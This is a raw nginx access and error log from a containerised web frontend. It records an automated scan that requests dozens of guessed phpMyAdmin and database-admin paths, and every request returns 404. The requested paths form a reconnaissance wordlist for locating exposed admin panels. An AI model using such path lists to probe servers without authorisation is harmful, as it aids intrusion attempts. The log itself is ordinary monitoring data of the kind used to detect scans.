frontend_1  | 2021/05/03 22:07:32 [error] 18#18: *37 open() "/frontend/app/administrator/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:32 +0000] "GET /administrator/db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:33 +0000] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:33 [error] 18#18: *38 open() "/frontend/app/mysql/mysqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:33 [error] 18#18: *39 open() "/frontend/app/phpmyadmin2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:33 +0000] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:34 +0000] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:34 [error] 18#18: *40 open() "/frontend/app/mysqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:34 [error] 18#18: *41 open() "/frontend/app/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:34 +0000] "GET /db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:35 +0000] "GET /PMA2011/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:35 [error] 18#18: *42 open() "/frontend/app/PMA2011/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2011/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:35 [error] 18#18: *43 open() "/frontend/app/phpMyAdmin5/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:35 +0000] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:36 [error] 18#18: *44 open() "/frontend/app/sql/phpMyAdmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:36 +0000] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:36 +0000] "GET /PMA2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:36 [error] 18#18: *45 open() "/frontend/app/PMA2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:37 [error] 18#18: *46 open() "/frontend/app/phpmyadmin2020/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2020/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:37 +0000] "GET /phpmyadmin2020/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:37 [error] 18#18: *47 open() "/frontend/app/db/phpMyAdmin-3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:37 +0000] "GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:38 +0000] "GET /pma2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:38 [error] 18#18: *48 open() "/frontend/app/pma2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:38 [error] 18#18: *49 open() "/frontend/app/phpmyadmin4/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin4/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:38 +0000] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:39 [error] 18#18: *50 open() "/frontend/app/phpMyAdmin-3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:39 +0000] "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:39 [error] 18#18: *51 open() "/frontend/app/pma2011/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2011/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:39 +0000] "GET /pma2011/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:40 [error] 18#18: *52 open() "/frontend/app/phpmyadmin2014/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:40 +0000] "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:40 [error] 18#18: *53 open() "/frontend/app/administrator/admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:40 +0000] "GET /administrator/admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:41 [error] 18#18: *54 open() "/frontend/app/phpmyadmin2013/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:41 +0000] "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:41 +0000] "GET /myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:41 [error] 18#18: *55 open() "/frontend/app/myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:42 +0000] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:42 [error] 18#18: *56 open() "/frontend/app/phpmyadmin2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:42 [error] 18#18: *57 open() "/frontend/app/phpMyAdmin_/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin_/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:42 +0000] "GET /phpMyAdmin_/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:43 +0000] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:43 [error] 18#18: *58 open() "/frontend/app/phpmy/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmy/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:43 +0000] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:43 [error] 18#18: *59 open() "/frontend/app/mysql/admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:44 +0000] "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:44 [error] 18#18: *60 open() "/frontend/app/db/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:44 [error] 18#18: *61 open() "/frontend/app/phpMyAdmin1/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin1/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:44 +0000] "GET /phpMyAdmin1/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:45 [error] 18#18: *62 open() "/frontend/app/db/phpmyadmin3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:45 +0000] "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:45 [error] 18#18: *63 open() "/frontend/app/phpmyadmin2011/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2011/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:45 +0000] "GET /phpmyadmin2011/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:46 [error] 18#18: *64 open() "/frontend/app/_phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:46 +0000] "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:46 [error] 18#18: *65 open() "/frontend/app/PMA2015/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2015/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:46 +0000] "GET /PMA2015/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:47 [error] 18#18: *66 open() "/frontend/app/PMA2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:47 +0000] "GET /PMA2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:47 [error] 18#18: *67 open() "/frontend/app/phpmy/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmy/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:47 +0000] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:48 [error] 18#18: *68 open() "/frontend/app/mysql/pMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/pMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:48 +0000] "GET /mysql/pMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:48 [error] 18#18: *69 open() "/frontend/app/mysql/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:48 +0000] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:49 +0000] "GET /administrator/pma/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:49 [error] 18#18: *70 open() "/frontend/app/administrator/pma/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/pma/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:49 +0000] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:49 [error] 18#18: *71 open() "/frontend/app/mysql/sqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:50 [error] 18#18: *72 open() "/frontend/app/phpmyadmin2017/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2017/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:50 +0000] "GET /phpmyadmin2017/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:50 [error] 18#18: *73 open() "/frontend/app/db/webadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/webadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:50 +0000] "GET /db/webadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:51 [error] 18#18: *74 open() "/frontend/app/_phpmyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /_phpmyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:51 +0000] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:51 +0000] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:51 [error] 18#18: *75 open() "/frontend/app/phpmyadmin2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:52 [error] 18#18: *76 open() "/frontend/app/PMA2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:52 +0000] "GET /PMA2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:52 [error] 18#18: *77 open() "/frontend/app/phpmyadmin2018/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:52 +0000] "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:53 [error] 18#18: *78 open() "/frontend/app/db/websql/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/websql/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:53 +0000] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:53 [error] 18#18: *79 open() "/frontend/app/phpmyadmin5/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin5/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:53 +0000] "GET /phpmyadmin5/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:54 +0000] "GET /pma2017/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:54 [error] 18#18: *80 open() "/frontend/app/pma2017/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2017/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:07:54 [error] 18#18: *81 open() "/frontend/app/phpmyadmin2011/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2011/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:54 +0000] "GET /phpmyadmin2011/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:55 [error] 18#18: *82 open() "/frontend/app/mysql/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:55 +0000] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:55 [error] 18#18: *83 open() "/frontend/app/phpMyAdmin1/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin1/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:55 +0000] "GET /phpMyAdmin1/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:56 [error] 18#18: *84 open() "/frontend/app/sql/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:56 +0000] "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:56 [error] 18#18: *85 open() "/frontend/app/sql/sqlweb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/sqlweb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:56 +0000] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:57 [error] 18#18: *86 open() "/frontend/app/pma2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:57 +0000] "GET /pma2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:57 [error] 18#18: *87 open() "/frontend/app/admin/phpmyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:57 +0000] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:58 [error] 18#18: *88 open() "/frontend/app/sql/websql/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/websql/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:58 +0000] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:58 [error] 18#18: *89 open() "/frontend/app/admin/sqladmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /admin/sqladmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:58 +0000] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:59 +0000] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
